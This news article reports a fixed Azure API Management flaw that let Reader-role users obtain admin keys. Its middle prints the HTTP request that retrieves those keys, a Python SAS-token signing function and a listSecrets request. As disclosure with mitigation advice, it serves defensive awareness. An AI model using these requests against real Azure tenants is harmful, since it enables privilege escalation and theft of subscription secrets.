A vulnerability in Azure API Management (APIM) has been identified. It allows attackers to escalate privileges and access sensitive information.
This issue arises from a flaw in the Azure Resource Manager (ARM) API, which permits unauthorized access to critical resources.
This article delves into the specifics of the vulnerability, its implications, and the steps taken to mitigate the risk.
The Azure Resource Manager (ARM) API manages Azure resources, including APIM instances.
When users with Reader permissions access an APIM resource, the ARM API typically restricts certain actions, as a report by BinarySecurity.
Decoding Compliance: What CISOs Need to Know – Join Free Webinar
However, older versions of the ARM API allowed users with Reader access to view all subscription keys, read client credentials of identity provider service principals, and access keys for the Direct Management API.
To address these issues, Microsoft introduced a feature to enforce a minimum ARM API version, thereby blocking older, vulnerable versions.
By setting this restriction to an API version newer than 2020, users with Reader access are prevented from viewing subscription keys and other sensitive information.
Despite these measures, a bug bypassed these restrictions by allowing access to admin user keys.
The Direct Management API is a crucial component of an APIM instance. It enables operations on entities such as users, groups, products, and subscriptions.
An Admin user is created with extensive permissions over these entities by default. The vulnerability lies in the ability of users with Reader privileges to exploit an overlooked ARM API endpoint and gain unauthorized access.
Here is an example of how attackers could exploit this vulnerability:
GET /subscriptions/<subscription>/resourceGroups/<resource_group>/providers/Microsoft.ApiManagement/service/<instance_name>/users/1/keys?api-version=2023-03-01-preview HTTP/2
Host: management.azure.com
Authorization: Bearer <legitimate_arm_bearer_token>
This request allows attackers to retrieve admin user keys and generate Shared Access Signatures (SAS), granting further access to sensitive data.
The vulnerability can be demonstrated by accessing admin user keys and generating SAS tokens.
These tokens can be used to interact with the APIM Management API and perform unauthorized actions:
def get_expiry(self):
return (datetime.datetime.utcnow() + datetime.timedelta(hours=24)).strftime("%Y-%m-%dT%H:%M:%S.0000000Z")
def generate_apim_sas_token(self, key, uid, version=1):
exp = self.get_expiry()
if version == 1:
message = f"uid={uid}&ex={exp}"
message_to_sign = f"{uid}\n{exp}"
signature = base64.b64encode(self.hmac_sha512(message_to_sign, key)).decode("utf-8")
sas_token = f"{message}&sn={signature}"
return sas_token
With these tokens, attackers can list subscription keys or identity provider keys:
/subscription/0/resourceGroups/0/providers/Microsoft.ApiManagement/service/0/subscriptions/<sub_id>/listSecrets?api-version=2022-08-01 HTTP/1.1
Host: <service>.management.azure-api.net
Authorization: SharedAccessSignature uid=1&ex=2024-05-01T00:00:00:000000Z&sn=ABCDEFG==
Content-Length: 0
Content-Type: application/json
Microsoft addressed this vulnerability by restricting the ARM API for users with Reader privileges.
The fix was implemented swiftly and retroactively applied to all APIM instances. Despite this resolution, similar vulnerabilities may emerge in the future.
To enhance security and build defense in depth, it is recommended that critical Azure resources be made private and accessible only from their virtual networks (VNETs).
Additionally, organizations should consider deploying security measures such as CI/CD runners to monitor and manage resource access.
The vulnerability was classified as having a vital severity level with a security impact of elevation of privilege.
As cloud environments evolve, vigilance and proactive security measures remain essential in protecting sensitive data and maintaining system integrity.
Simulating Cyberattack Scenarios With All-in-One Cybersecurity Platform – Watch Free Webinar
It’s clear that a person’s reputation is increasingly influenced by their online presence, which spans…
Researchers identified a threat actor leveraging Google Search ads to target graphic design professionals, as…
Recent cyberattacks targeting critical infrastructure, including fuel management systems and water treatment facilities in Israel…
Hackers have begun exploiting a newly discovered vulnerability in Apache Struts2, a widely used open-source…
Recent cybersecurity research has uncovered a concerning trend where hackers are exploiting Microsoft Teams to…
Microsoft has announced that it is currently blocking an astounding 7,000 password attacks every second,…